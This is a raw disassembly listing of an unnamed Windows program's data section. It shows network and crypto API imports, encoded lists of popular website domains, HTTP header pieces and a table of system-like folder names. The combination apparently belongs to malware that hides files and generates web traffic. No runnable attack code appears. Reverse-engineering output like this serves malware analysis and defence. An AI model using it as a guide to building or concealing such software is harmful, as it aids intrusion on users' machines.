dword_9B9E2C dd 0FFFFFFFFh, 9B47E0h, 9AF908h ; DATA XREF: .text:off_9BAB3E�o
dword_9B9E38 dd 0FFFFFFFFh, 9B460Ch, 9B51C0h ; DATA XREF: .text:off_9B9A25�o
off_9B9E44 dd offset loc_9AC184 ; DATA XREF: sub_9AD97C+1F26�r
dword_9B9E48 dd 31302E35h ; DATA XREF: .text:009B9A74�o
db 0
off_9B9E4D dd offset loc_9B36AC ; DATA XREF: sub_9B4950-8893�r
align 4
dword_9B9E54 dd 2E6F6F67h, 6A2E656Eh ; DATA XREF: .text:009B9B64�o
db 70h, 0
off_9B9E5E dd offset loc_9B43CC ; DATA XREF: sub_9B27D8+D�r
align 4
aFindnextfilea db 'FindNextFileA',0 ; DATA XREF: .text:off_9B955D�o
off_9B9E72 dd offset loc_9AAF7C ; DATA XREF: sub_9B3BE8+17�r
off_9B9E76 dd offset loc_9ABAF0 ; DATA XREF: sub_9AC6DC+74B8�r
align 4
dword_9B9E7C dd 62657761h, 632E7265h ; DATA XREF: .text:009B9AD0�o
db 6Fh, 6Dh, 0
off_9B9E87 dd offset loc_9B4D58 ; DATA XREF: sub_9AB1A0+ADC5�r
align 4
aPolicy_0 db 'Policy',0 ; DATA XREF: .text:009BA2C8�o
off_9B9E93 dd offset aGettempfilenam ; DATA XREF: sub_9B0930:loc_9B4C0C�r
; "GetTempFileNameA"
off_9B9E97 dd offset loc_9B50A0 ; DATA XREF: sub_9B0930+3F93�r
off_9B9E9B dd offset loc_9AC608 ; DATA XREF: sub_9B3864+1277�r
off_9B9E9F dd offset loc_9ADB98 ; DATA XREF: sub_9B4950-1FEC�r
align 4
dword_9B9EA4 dd 77736E61h, 2E737265h, 6D6F63h ; DATA XREF: .text:009B9AC4�o
off_9B9EB0 dd offset loc_9B2354 ; DATA XREF: sub_9B562C-64BE�r
dword_9B9EB4 dd 0FFFFFFFFh, 9B1580h, 9AD338h ; DATA XREF: .text:off_9B94F8�o
off_9B9EC0 dd offset aWininet ; DATA XREF: sub_9B0930-4103�r
; "WININET"
off_9B9EC4 dd offset dword_9BAF6C ; DATA XREF: sub_9AFC28+5�r
dword_9B9EC8 dd 6E707365h, 2E6F672Eh, 6D6F63h, 65646F4Dh, 6Dh
; DATA XREF: .text:009B9B38�o
; .text:009BA288�o
aGettickcount db 'GetTickCount',0 ; DATA XREF: .text:off_9B9203�o
off_9B9EE9 dd offset sub_9B5904 ; DATA XREF: sub_9AEAAC+19F5�r
off_9B9EED dd offset loc_9B0DC8 ; DATA XREF: sub_9B4CF4-277F�r
off_9B9EF1 dd offset dword_9BBD28 ; DATA XREF: sub_9B4BF8-700D�r
; sub_9B18F8-DD7�r
off_9B9EF5 dd offset loc_9B0EA4 ; DATA XREF: sub_9B04A8+4CFB�r
align 4
dword_9B9EFC dd 73656573h, 6E2E6161h ; DATA XREF: .text:009B9C44�o
db 65h, 74h, 0
off_9B9F07 dd offset loc_9B5F6C ; DATA XREF: sub_9B6264+68�r
off_9B9F0B dd offset loc_9B41BC ; DATA XREF: sub_9B0930-9�r
off_9B9F0F dd offset loc_9AEF90 ; DATA XREF: sub_9AC32C+1B02�r
off_9B9F13 dd offset loc_9B5DD4 ; DATA XREF: sub_9ACA48+466B�r
off_9B9F17 dd offset loc_9B5BFC ; DATA XREF: sub_9B4950-3BE0�r
align 4
dword_9B9F1C dd 707041h ; DATA XREF: .text:009BA1DC�o
off_9B9F20 dd offset aCreatedirector ; DATA XREF: sub_9B0930:loc_9AB1F8�r
; "CreateDirectoryA"
off_9B9F24 dd offset loc_9B3A68 ; DATA XREF: sub_9AC6DC+378A�r
dword_9B9F28 dd 7274656Dh, 6F6C666Fh, 6F632E67h, 6Dh, 32373033h, 39h
; DATA XREF: .text:009B9BCC�o
dword_9B9F40 dd 2E6D6961h, 6D6F63h ; DATA XREF: .text:009B9AB0�o
off_9B9F48 dd offset loc_9AAFF0 ; DATA XREF: sub_9AB1A0+46�r
off_9B9F4C dd offset loc_9AE600 ; DATA XREF: sub_9ACEE8+86�r
dword_9B9F50 dd 6167656Dh, 63696C63h, 6F632E6Bh ; DATA XREF: .text:009B9BBC�o
db 6Dh, 0
off_9B9F5E dd offset loc_9B015C ; DATA XREF: sub_9AB1A0+2A7D�r
off_9B9F62 dd offset loc_9B0A64 ; DATA XREF: sub_9B0930+B06�r
off_9B9F66 dd offset loc_9B4134 ; DATA XREF: sub_9AF25C+4927�r
off_9B9F6A dd offset sub_9ADAC4 ; DATA XREF: sub_9B4950:loc_9AEF08�r
; sub_9B4950-1EDF�r ...
off_9B9F6E dd offset loc_9AE988 ; DATA XREF: sub_9B1A08+9B2�r
align 4
aBuild db 'Build',0 ; DATA XREF: .text:009BA1EC�o
off_9B9F7A dd offset loc_9ACBE4 ; DATA XREF: sub_9B0930-25A7�r
off_9B9F7E dd offset loc_9B21B0 ; DATA XREF: sub_9B2F1C+C9�r
off_9B9F82 dd offset loc_9B34B0 ; DATA XREF: sub_9ACEE8+5DBC�r
align 4
dword_9B9F88 dd 6174656Dh, 65666163h, 6D6F632Eh ; DATA XREF: .text:009B9BC8�o
db 0
off_9B9F95 dd offset dword_9BEBF4 ; DATA XREF: sub_9B2010-3915�r
off_9B9F99 dd offset dword_9BEBD0 ; DATA XREF: sub_9AB1A0+A6FE�r
off_9B9F9D dd offset sub_9B1134 ; DATA XREF: sub_9AFC28-A7C�r
align 4
aHtonl db 'htonl',0 ; DATA XREF: .text:off_9B9848�o
off_9B9FAA dd offset aInternetgetcon ; DATA XREF: sub_9B0930:loc_9AB374�r
; "InternetGetConnectedState"
align 10h
dword_9B9FB0 dd 0FFFFFFFFh, 9B50E4h, 9B528Ch, 69617774h, 6Eh
; DATA XREF: .text:off_9BA3F0�o
; .text:009BA320�o
dword_9B9FC4 dd 6674656Eh, 2E78696Ch, 6D6F63h ; DATA XREF: .text:009B9BF8�o
off_9B9FD0 dd offset aGetfileattribu ; DATA XREF: sub_9B0930:loc_9B426C�r
; "GetFileAttributesA"
aMobile db 'Mobile',0 ; DATA XREF: .text:009BA284�o
off_9B9FDB dd offset loc_9B0BE8 ; DATA XREF: sub_9AF030+2345�r
off_9B9FDF dd offset dword_9BF120 ; DATA XREF: sub_9B2118-1B89�r
; .text:009B4FC4�r
align 4
aObtainuseragen db 'ObtainUserAgentString',0 ; DATA XREF: .text:off_9B88CC�o
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0 ; DATA XREF: .text:off_9B8D85�o
align 4
aSonico_com db 'sonico.com',0 ; DATA XREF: .text:009B9C50�o
align 4
aSystemtimetofi db 'SystemTimeToFileTime',0 ; DATA XREF: .text:off_9B98D1�o
off_9BA02D dd offset loc_9AD444 ; DATA XREF: sub_9B2F1C-54B2�r
off_9BA031 dd offset loc_9B30E0 ; DATA XREF: sub_9B4FD0-A05C�r
align 4
aMedia db 'Media',0 ; DATA XREF: .text:009BA27C�o
align 10h
aDownloaded db 'Downloaded',0 ; DATA XREF: .text:009BA21C�o
align 4
aPhotobucket_co db 'photobucket.com',0 ; DATA XREF: .text:009B9C24�o
aApplicationXSh db ', application/x-shockwave-flash',0 ; DATA XREF: .text:009B88F8�o
off_9BA07C dd offset loc_9AADB8 ; DATA XREF: sub_9AB1A0+1B22�r
off_9BA080 dd offset loc_9B3DB4 ; DATA XREF: sub_9B43F4-3F1E�r
dword_9BA084 dd 6957203Bh ; DATA XREF: sub_9AB3B0:loc_9B24E0�r
dword_9BA088 dd 776F646Eh ; DATA XREF: sub_9AB3B0+7138�r
word_9BA08C dw 2073h ; DATA XREF: sub_9AB3B0+7140�r
byte_9BA08E db 0 ; DATA XREF: sub_9AB3B0+714B�r
off_9BA08F dd offset loc_9AEA48 ; DATA XREF: sub_9AB1A0+AA01�r
off_9BA093 dd offset loc_9B0C88 ; DATA XREF: sub_9B3150+2DE7�r
off_9BA097 dd offset loc_9AE9F4 ; DATA XREF: sub_9B649C-576F�r
align 4
aGetsystemtime db 'GetSystemTime',0 ; DATA XREF: .text:off_9B8E65�o
align 4
aAwempire_com db 'awempire.com',0 ; DATA XREF: .text:009B9AD4�o
off_9BA0B9 dd offset loc_9B17E4 ; DATA XREF: sub_9B3D1C+F8E�r
off_9BA0BD dd offset sub_9ACA48 ; DATA XREF: sub_9B2C70-55FB�r
; sub_9B1F68-21F3�r
off_9BA0C1 dd offset loc_9B0B98 ; DATA XREF: sub_9ABF08+6CF1�r
align 4
dword_9BA0C8 dd 0FFFFFFFFh, 9ABD1Ch, 9B1E5Ch ; DATA XREF: .text:off_9B93A3�o
off_9BA0D4 dd offset loc_9B4CF0 ; DATA XREF: .text:009AB514�r
aWininet db 'WININET',0 ; DATA XREF: .text:off_9B9EC0�o
off_9BA0E0 dd offset dword_9BACD0 ; DATA XREF: sub_9AE400+5�r
aDepositfiles_c db 'depositfiles.com',0 ; DATA XREF: .text:009B9B14�o
off_9BA0F5 dd offset aClosehandle ; DATA XREF: sub_9B0930:loc_9B50A0�r
; "CloseHandle"
align 4
aGetversion db 'GetVersion',0 ; DATA XREF: .text:off_9B979B�o
off_9BA107 dd offset aWsaioctl ; DATA XREF: sub_9B0930:loc_9AEFC0�r
; "WSAIoctl"
off_9BA10B dd offset dword_9BAD64 ; DATA XREF: sub_9B3150+5�r
off_9BA10F dd offset loc_9B1E44 ; DATA XREF: sub_9B4FD0-623D�r
off_9BA113 dd offset dword_9B9234 ; DATA XREF: sub_9AF030+5�r
align 4
dword_9BA118 dd 3436h ; DATA XREF: .text:off_9BA1D0�o
dword_9BA11C dd 67616D69h, 61687365h, 752E6B63h, 73h ; DATA XREF: .text:009B9B80�o
dword_9BA12C dd 67756F67h, 632E756Fh ; DATA XREF: .text:009B9B70�o
db 6Fh, 6Dh, 0
off_9BA137 dd offset loc_9B2CE4 ; DATA XREF: sub_9B327C-8168�r
align 4
dword_9BA13C dd 0FFFFFFFFh, 9B3DECh, 9B1D3Ch ; DATA XREF: .text:off_9B8E0C�o
dword_9BA148 dd 0FFFFFFFFh, 9AC1F4h, 9B4090h ; DATA XREF: .text:off_9BB097�o
off_9BA154 dd offset dword_9B8814 ; DATA XREF: sub_9ADCEC+5�r
off_9BA158 dd offset loc_9AC8EC ; DATA XREF: sub_9B63D8-80DF�r
off_9BA15C dd offset loc_9B2224 ; DATA XREF: sub_9ADAC4+7204�r
off_9BA160 dd offset aGetlasterror ; DATA XREF: sub_9B0930:loc_9ABB88�r
; "GetLastError"
off_9BA164 dd offset loc_9AB734 ; DATA XREF: sub_9B3408-627E�r
off_9BA168 dd offset loc_9ADC08 ; DATA XREF: sub_9AB1A0-183�r
off_9BA16C dd offset aContentLength ; DATA XREF: sub_9B63D8-6918�r
; "\r\nContent-Length: "
off_9BA170 dd offset sub_9B1648 ; DATA XREF: sub_9B2160+388A�r
dword_9BA174 dd 6E726F70h, 2E627568h, 6D6F63h ; DATA XREF: .text:009B9C2C�o
off_9BA180 dd offset dword_9BEC1C ; DATA XREF: sub_9B1584+66�r
; .text:009B40E5�r
dword_9BA184 dd 6964656Dh, 72696661h, 6F632E65h, 6Dh ; DATA XREF: .text:009B9BB8�o
aCryptacquireco db 'CryptAcquireContextA',0 ; DATA XREF: .text:off_9B9530�o
off_9BA1A9 dd offset loc_9B30B0 ; DATA XREF: sub_9AC6DC+6F1B�r
align 10h
dword_9BA1B0 dd 0FFFFFFFFh, 9AB3ACh, 9B4BA8h ; DATA XREF: .text:off_9BA971�o
dword_9BA1BC dd 65707974h, 2E646170h, 6D6F63h ; DATA XREF: .text:009B9C8C�o
off_9BA1C8 dd offset loc_9AC080 ; DATA XREF: sub_9B0930+2EB0�r
align 10h
off_9BA1D0 dd offset dword_9BA118 ; DATA XREF: sub_9AE860+EEE�r
; sub_9AE860:loc_9B5A10�r
dd offset aAdobe ; "Adobe"
dd offset dword_9B88D4+8
dd offset dword_9B9F1C
dd offset dword_9B9994+0Ch
dd offset aAssembly ; "assembly"
dd offset aBoot_0 ; "Boot"
dd offset aBuild ; "Build"
dd offset aCalendar ; "Calendar"
dd offset aCollaboration ; "Collaboration"
dd offset aCommon ; "Common"
dd offset aComponents ; "Components"
dd offset aCursors ; "Cursors"
dd offset aDebug ; "Debug"
dd offset aDefender_0 ; "Defender"
dd offset aDefinitions ; "Definitions"
dd offset aDigital ; "Digital"
dd offset aDistribution ; "Distribution"
dd offset aDocuments ; "Documents"
dd offset aDownloaded ; "Downloaded"
dd offset dword_9BA600
dd offset aExplorer ; "Explorer"
dd offset aFiles ; "Files"
dd offset aFonts ; "Fonts"
dd offset aGallery ; "Gallery"
dd offset aGames ; "Games"
dd offset aGlobalization ; "Globalization"
dd offset aGoogle ; "Google"
dd offset aHelp_0 ; "Help"
dd offset dword_9BAABC
dd offset dword_9B9734
dd offset aInstaller_0 ; "Installer"
dd offset aIntel ; "Intel"
dd offset aInter ; "Inter"
dd offset dword_9B95D8+14h
dd offset aJava ; "Java"
dd offset aJournal ; "Journal"
dd offset aKernel ; "Kernel"
dd offset dword_9B9500+8
dd offset aLive ; "Live"
dd offset aLogs ; "Logs"
dd offset aMail ; "Mail"
dd offset aMaker ; "Maker"
dd offset aMedia ; "Media"
dd offset aMicrosoft_0 ; "Microsoft"
dd offset aMobile ; "Mobile"
dd offset dword_9B9EC8+0Ch
dd offset aMovie ; "Movie"
dd offset aMs_0 ; "MS"
dd offset aMsdownld ; "msdownld"
dd offset dword_9BA5F4
dd offset aNew ; "New"
dd offset aOffice ; "Office"
dd offset aOffline ; "Offline"
dd offset aOptions ; "Options"
dd offset dword_9B97A4+0Ch
dd offset aPages ; "Pages"
dd offset aPatch ; "Patch"
dd offset aPerformance ; "Performance"
dd offset aPhoto ; "Photo"
dd offset aPla ; "PLA"
dd offset aPlayer ; "Player"
dd offset aPolicy_0 ; "Policy"
dd offset aPrefetch ; "Prefetch"
dd offset aProfiles ; "Profiles"
dd offset aProgram ; "Program"
dd offset aPublish ; "Publish"
dd offset aReference ; "Reference"
dd offset aRegistered ; "Registered"
dd offset aRegistration ; "registration"
dd offset aReports ; "Reports"
dd offset aResources ; "Resources"
dd offset aSchemas ; "schemas"
dd offset aSecurity_0 ; "Security"
dd offset aService_0 ; "Service"
dd offset aSetup ; "Setup"
dd offset aShell_0 ; "Shell"
dd offset aSoftware ; "Software"
dd offset aSpeech ; "Speech"
dd offset aSystem_0 ; "System"
dd offset aTasks ; "Tasks"
dd offset aTemp ; "Temp"
dd offset dword_9BA734
dd offset aTracing ; "tracing"
dd offset dword_9B9FB0+0Ch
dd offset dword_9B8974
dd offset dword_9B8D30+8
dd offset aVisual ; "Visual"
dd offset dword_9BA348
dd offset aWinsxs ; "winsxs"
dd offset dword_9B8890+0Ch
dd offset byte_9BA674
off_9BA340 dd offset loc_9AAEF0 ; DATA XREF: sub_9B4FD0+749�r
off_9BA344 dd offset aSleep_0 ; DATA XREF: sub_9B0930:loc_9B2790�r
; "Sleep"
dword_9BA348 dd 626557h ; DATA XREF: .text:009BA330�o
dword_9BA34C dd 0FFFFFFFFh, 9B0214h, 9AD084h ; DATA XREF: .text:off_9B99E0�o
off_9BA358 dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-149E�r
dd offset dword_9BA8F8
dd offset aApplicationXMs ; ", application/x-ms-xbap"
off_9BA364 dd offset loc_9B5BA8 ; DATA XREF: sub_9B63D8-AE6C�r
aTracing db 'tracing',0 ; DATA XREF: .text:009BA31C�o
off_9BA370 dd offset aGetprocaddress ; DATA XREF: sub_9B0930:loc_9B2DB8�r
; "GetProcAddress"
off_9BA374 dd offset loc_9B4EA8 ; DATA XREF: sub_9B63D8-45B0�r
off_9BA378 dd offset loc_9B3E44 ; DATA XREF: sub_9B0930-3FA1�r
dword_9BA37C dd 0FFFFFFFFh, 9B2008h, 9B1AD0h ; DATA XREF: .text:off_9B984C�o
off_9BA388 dd offset loc_9B5D64 ; DATA XREF: sub_9B46CC-7D99�r
off_9BA38C dd offset dword_9BAE88 ; DATA XREF: sub_9B43F4+5�r
aClosehandle db 'CloseHandle',0 ; DATA XREF: .text:off_9BA0F5�o
off_9BA39C dd offset loc_9B240C ; DATA XREF: sub_9B2E04+80�r
off_9BA3A0 dd offset loc_9B4E98 ; DATA XREF: sub_9B1D80-6D96�r
off_9BA3A4 dd offset loc_9AF200 ; DATA XREF: sub_9ABF08+DC9�r
dword_9BA3A8 dd 65656D69h, 6F632E6Dh, 6Dh ; DATA XREF: .text:009B9B8C�o
dword_9BA3B4 dd 0FFFFFFFFh, 9B2320h, 9AB444h ; DATA XREF: .text:off_9B90DD�o
aCreatefilea db 'CreateFileA',0 ; DATA XREF: .text:off_9BAC5F�o
off_9BA3CC dd offset loc_9ABA24 ; DATA XREF: sub_9B327C-588�r
off_9BA3D0 dd offset loc_9AB774 ; DATA XREF: sub_9AFC28+4A�r
off_9BA3D4 dd offset aRegqueryvaluee ; DATA XREF: sub_9B0930:loc_9B574C�r
; "RegQueryValueExA"
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: .text:off_9BADC4�o
align 4
dword_9BA3E4 dd 0FFFFFFFFh, 9B5720h, 9B4548h ; DATA XREF: .text:off_9B8CAD�o
off_9BA3F0 dd offset dword_9B9FB0 ; DATA XREF: sub_9B2F1C+5�r
off_9BA3F4 dd offset dword_9BAF84 ; DATA XREF: sub_9B174C+5�r
off_9BA3F8 dd offset loc_9AF858 ; DATA XREF: sub_9AB1A0+2B35�r
aPerformance db 'Performance',0 ; DATA XREF: .text:009BA2B8�o
off_9BA408 dd offset loc_9B0DB0 ; DATA XREF: sub_9B1B20-5EA2�r
off_9BA40C dd offset loc_9B3A50 ; DATA XREF: sub_9B4FD0-5E3B�r
off_9BA410 dd offset loc_9AEB54 ; DATA XREF: sub_9AB1A0+2FA8�r
dword_9BA414 dd 66726570h, 746F7073h, 6D6F632Eh ; DATA XREF: .text:009B9C20�o
db 0
off_9BA421 dd offset aWaitforsingleo ; DATA XREF: sub_9B0930:loc_9AD55C�r
; "WaitForSingleObject"
off_9BA425 dd offset loc_9AB870 ; DATA XREF: sub_9ADCEC-EA0�r
align 4
off_9BA42C dd offset byte_9B8D28 ; DATA XREF: sub_9AF5E4-1CA5�r
dd offset a1_ ; "1."
dd offset byte_9B93A0
dword_9BA438 dd 632E3635h ; DATA XREF: .text:009B9A9C�o
db 6Fh, 6Dh, 0
off_9BA43F dd offset loc_9B1344 ; DATA XREF: sub_9B174C+5E�r
off_9BA443 dd offset loc_9B4C94 ; DATA XREF: sub_9B3D1C+47�r
align 4
aApplicationVnd db ', application/vnd.ms-xpsdocument',0 ; DATA XREF: .text:009B9060�o
off_9BA469 dd offset loc_9B07C8 ; DATA XREF: sub_9B562C-4B20�r
align 10h
dword_9BA470 dd 6F736F73h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9C54�o
dword_9BA47C dd 0FFFFFFFFh, 9B4074h, 9AE4C4h ; DATA XREF: .text:off_9BAB94�o
off_9BA488 dd offset loc_9AF780 ; DATA XREF: sub_9B1A08+386C�r
off_9BA48C dd offset dword_9B8E6C ; DATA XREF: sub_9B63D8-14DA�r
dd offset dword_9BB014
dd offset dword_9BA998
dd offset dword_9B9474
dd offset dword_9B8880
dd offset dword_9BA8F8
dd offset dword_9BA8F8
dd offset dword_9BA8F8
dd offset dword_9BA8F8
dd offset dword_9BA8F8
aCalendar db 'Calendar',0 ; DATA XREF: .text:009BA1F0�o
align 10h
aTemp db 'Temp',0 ; DATA XREF: .text:009BA314�o
off_9BA4C5 dd offset loc_9B11B4 ; DATA XREF: sub_9B1A08-133A�r
align 4
aSecurity_0 db 'Security',0 ; DATA XREF: .text:009BA2F4�o
off_9BA4D5 dd offset loc_9AE9DC ; DATA XREF: sub_9B649C-3B0D�r
off_9BA4D9 dd offset loc_9AB300 ; DATA XREF: sub_9B3EFC-3C04�r
off_9BA4DD dd offset loc_9B1450 ; DATA XREF: sub_9B3D1C-2518�r
off_9BA4E1 dd offset loc_9AD958 ; DATA XREF: sub_9B1D80-5919�r
align 4
dword_9BA4E8 dd 0FFFFFFFFh ; DATA XREF: sub_9AC250+C7�r
; .text:009AD39E�r ...
dd 0FFFFFFFFh, 0F0F6BFBBh, 0BB5A5FF3h, 0F3977011h, 0EB67BFBFh
dd 5F9BFAC8h, 34D88091h, 1E2282DFh, 573402C4h, 0C0000084h
dd 3000209h, 1600002h, 5000h, 801000C0h, 500040h, 0A1h
dd 2 dup(1000000h), 22A20h, 80h, 4000000h, 40020000h, 88000000h
dd 180h, 81000h, 8801900h, 800B81h, 280h, 80002C0h, 0A80000h
dd 8000h, 100040h, 100000h, 2 dup(0)
dd 10000008h, 2 dup(0)
dd 4, 2, 0
dd 40000h, 3 dup(0)
dd 410000h, 82000000h, 2 dup(0)
dd 1, 0Bh dup(0)
dd 8, 80000000h
off_9BA5E8 dd offset loc_9B5EAC ; DATA XREF: sub_9B0930-5329�r
off_9BA5EC dd offset dword_9B9498 ; DATA XREF: sub_9B5480+5�r
off_9BA5F0 dd offset loc_9ABD24 ; DATA XREF: sub_9AB1A0-3C3�r
dword_9BA5F4 dd 54454Eh ; DATA XREF: .text:009BA298�o
off_9BA5F8 dd offset loc_9B07A4 ; DATA XREF: sub_9ABD30+42D5�r
off_9BA5FC dd offset loc_9B06A4 ; DATA XREF: sub_9B1A08-4835�r
dword_9BA600 dd 6E65h ; DATA XREF: .text:009BA220�o
dword_9BA604 dd 62656D61h, 706A2E61h ; DATA XREF: .text:009B9ABC�o
db 0
off_9BA60D dd offset loc_9B4530 ; DATA XREF: sub_9B04A8-44FD�r
off_9BA611 dd offset loc_9AD3DC ; DATA XREF: sub_9B3864+1A63�r
off_9BA615 dd offset loc_9B4D94 ; DATA XREF: sub_9B63D8-583�r
align 4
dword_9BA61C dd 3520544Eh ; DATA XREF: .text:009BAD38�o
db 2Eh, 30h, 0
off_9BA623 dd offset dword_9BBF5C ; DATA XREF: sub_9B4610-91BA�r
; sub_9B35A0-6BF5�r ...
align 4
dword_9BA628 dd 65697266h, 7473646Eh, 632E7265h ; DATA XREF: .text:009B9B58�o
db 6Fh, 6Dh, 0
off_9BA637 dd offset loc_9B6318 ; DATA XREF: sub_9ADAC4-2686�r
off_9BA63B dd offset loc_9B5F54 ; DATA XREF: sub_9AB1A0+539D�r
align 10h
dword_9BA640 dd 2E33h ; DATA XREF: .text:009B90C4�o
aMicrosoftBaseC db 'Microsoft Base Cryptographic Provider v1.0',0
; DATA XREF: .text:off_9B9207�o
off_9BA66F dd offset loc_9ABFB4 ; DATA XREF: sub_9ADAC4+52EC�r
align 4
byte_9BA674 db 5Ah, 78h, 0 ; DATA XREF: .text:009BA33C�o
off_9BA677 dd offset loc_9B19C4 ; DATA XREF: sub_9AF030+1BD4�r
align 4
dword_9BA67C dd 0FFFFFFFFh, 9B062Ch, 9AB51Ch ; DATA XREF: .text:off_9BAD4C�o
off_9BA688 dd offset loc_9ACCB4 ; DATA XREF: sub_9AB1A0+39C3�r
off_9BA68C dd offset aInterlockedexc ; DATA XREF: sub_9B0930:loc_9B1408�r
; "InterlockedExchange"
off_9BA690 dd offset loc_9ADFBC ; DATA XREF: sub_9B3408+368�r
off_9BA694 dd offset loc_9ACAF8 ; DATA XREF: sub_9ACEE8+1B38�r
off_9BA698 dd offset aRegclosekey ; DATA XREF: sub_9B0930:loc_9B38FC�r
; "RegCloseKey"
off_9BA69C dd offset dword_9B9E1C ; DATA XREF: sub_9B29B0+5�r
aGames db 'Games',0 ; DATA XREF: .text:009BA234�o
align 4
dword_9BA6A8 dd 0FFFFFFFFh, 9B25D0h, 9B2EFCh ; DATA XREF: .text:off_9B9095�o
dword_9BA6B4 dd 0FFFFFFFFh, 9AD8B4h, 9B5BE0h ; DATA XREF: .text:off_9B8FCC�o
dword_9BA6C0 dd 0FFFFFFFFh, 9AE208h, 9AECDCh ; DATA XREF: .text:off_9BAFCF�o
off_9BA6CC dd offset dword_9B88E4 ; DATA XREF: sub_9ACA48+5�r
dword_9BA6D0 dd 676F6F67h, 632E656Ch ; DATA XREF: .text:009B9B68�o
db 6Fh, 6Dh, 0
off_9BA6DB dd offset loc_9B129C ; DATA XREF: sub_9B5904-1A0E�r
off_9BA6DF dd offset loc_9B296C ; DATA XREF: sub_9ADAC4-1C86�r
align 4
dword_9BA6E4 dd 6E657574h, 632E6974h, 6D6Fh ; DATA XREF: .text:009B9C88�o
dword_9BA6F0 dd 67616D69h, 6E657665h, 632E6575h ; DATA XREF: .text:009B9B84�o
db 6Fh, 6Dh, 0
off_9BA6FF dd offset loc_9B07FC ; DATA XREF: sub_9B3408-4DBD�r
off_9BA703 dd offset loc_9AEEC4 ; DATA XREF: sub_9B46CC+F�r
off_9BA707 dd offset loc_9AC7E4 ; DATA XREF: sub_9B57B4-22A0�r
align 4
dword_9BA70C dd 50545448h, 312E312Fh ; DATA XREF: .text:off_9B9645�o
db 20h, 0
off_9BA716 dd offset loc_9B06D4 ; DATA XREF: sub_9ABA3C+28D0�r
align 4
dword_9BA71C dd 69726174h, 2E61676Eh, 74656Eh ; DATA XREF: .text:009B9C64�o
dword_9BA728 dd 6F646162h, 6F632E6Fh, 6Dh ; DATA XREF: .text:009B9ADC�o
dword_9BA734 dd 706D74h ; DATA XREF: .text:009BA318�o
; .text:off_9BA865�o
a08x04x04x04x08 db '{%08X-%04X-%04X-%04X-%08X%04X}',0 ; DATA XREF: .text:off_9BA861�o
align 4
aApplicationX_0 db ', application/x-ms-application',0 ; DATA XREF: .text:009B9678�o
align 4
aDisney_go_com db 'disney.go.com',0 ; DATA XREF: .text:009B9B1C�o
off_9BA786 dd offset loc_9AFA38 ; DATA XREF: sub_9B2118+3F�r
align 4
dword_9BA78C dd 6576696Ch, 6D73616Ah, 632E6E69h, 6D6Fh ; DATA XREF: .text:009B9BA8�o
dword_9BA79C dd 4E2E203Bh ; DATA XREF: sub_9AF5E4:loc_9AD704�r
dword_9BA7A0 dd 43205445h ; DATA XREF: sub_9AF5E4-1ED7�r
dword_9BA7A4 dd 20524Ch ; DATA XREF: sub_9AF5E4-1ECF�r
off_9BA7A8 dd offset dword_9BAD04 ; DATA XREF: sub_9B4CF4+5�r
off_9BA7AC dd offset loc_9B2368 ; DATA XREF: sub_9B0930+1630�r
aGettempfilenam db 'GetTempFileNameA',0 ; DATA XREF: .text:off_9B9E93�o
off_9BA7C1 dd offset sub_9B1A08 ; DATA XREF: sub_9B4950+58�r
; sub_9B4950+78�r
off_9BA7C5 dd offset loc_9AB2B0 ; DATA XREF: sub_9B1F68-4167�r
off_9BA7C9 dd offset loc_9B1D30 ; DATA XREF: sub_9B5228+2E�r
off_9BA7CD dd offset loc_9AB2D8 ; DATA XREF: sub_9AC250+7453�r
align 4
dword_9BA7D4 dd 746C756Dh, 796C7069h, 6D6F632Eh ; DATA XREF: .text:009B9BE0�o
db 0
off_9BA7E1 dd offset loc_9B4B18 ; DATA XREF: sub_9B0930-10E8�r
align 4
aCollaboration db 'Collaboration',0 ; DATA XREF: .text:009BA1F4�o
off_9BA7F6 dd offset loc_9B14B8 ; DATA XREF: sub_9AF5E4+13FE�r
off_9BA7FA dd offset loc_9ACB34 ; DATA XREF: sub_9ABD30+89EB�r
off_9BA7FE dd offset aCryptgenrandom ; DATA XREF: sub_9B0930:loc_9B5EAC�r
; "CryptGenRandom"
align 4
off_9BA804 dd offset a2914 ; DATA XREF: sub_9AF960-323�r
; "2914"
dd offset a3705 ; "3705"
dd offset a4322 ; "4322"
dd offset a4325 ; "4325"
dd offset a04506 ; "04506"
dd offset a21022 ; "21022"
dd offset dword_9B9F28+10h
dd offset dword_9B9064+8
dd offset a50727 ; "50727"
off_9BA828 dd offset loc_9AD9F8 ; DATA XREF: sub_9B3864-86D4�r
off_9BA82C dd offset loc_9B195C ; DATA XREF: sub_9B1D80-32DA�r
dword_9BA830 dd 0FFFFFFFFh, 9B0530h, 9B5A28h ; DATA XREF: .text:off_9B8EB4�o
off_9BA83C dd offset loc_9B4AA4 ; DATA XREF: sub_9B5904-1108�r
off_9BA840 dd offset loc_9ABC84 ; DATA XREF: sub_9B4480-61F0�r
dword_9BA844 dd 7A6F6375h, 75722Eh ; DATA XREF: .text:009B9C90�o
off_9BA84C dd offset loc_9B3F78 ; DATA XREF: sub_9AF030-759�r
off_9BA850 dd offset aHtons ; DATA XREF: sub_9B0930:loc_9AFE8C�r
; "htons"
aJava db 'Java',0 ; DATA XREF: .text:009BA25C�o
off_9BA859 dd offset loc_9ACE18 ; DATA XREF: sub_9B3408-2BF9�r
off_9BA85D dd offset loc_9B09B4 ; DATA XREF: sub_9B6078-B0A4�r
; char *off_9BA861
off_9BA861 dd offset a08x04x04x04x08 ; DATA XREF: sub_9AD3EC+3E6C�r
; "{%08X-%04X-%04X-%04X-%08X%04X}"
off_9BA865 dd offset dword_9BA734 ; DATA XREF: sub_9ABA3C+A2D7�r
off_9BA869 dd offset loc_9B3F98 ; DATA XREF: sub_9B174C-3FD�r
align 10h
dword_9BA870 dd 0FFFFFFFFh, 9B07B4h, 9B012Ch ; DATA XREF: .text:off_9BAF53�o
off_9BA87C dd offset loc_9B6548 ; DATA XREF: sub_9AB040+5D68�r
off_9BA880 dd offset aListen ; DATA XREF: sub_9B0930:loc_9AC04C�r
; "listen"
a_memicmp db '_memicmp',0 ; DATA XREF: .text:off_9BAED9�o
off_9BA88D dd offset loc_9B0D64 ; DATA XREF: sub_9B4950-5A0A�r
off_9BA891 dd offset loc_9B3228 ; DATA XREF: sub_9AEDD0+3158�r
align 4
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_9B0930:loc_9B000C�o
off_9BA8AD dd offset dword_9B8DC8 ; DATA XREF: sub_9B35A0+5�r
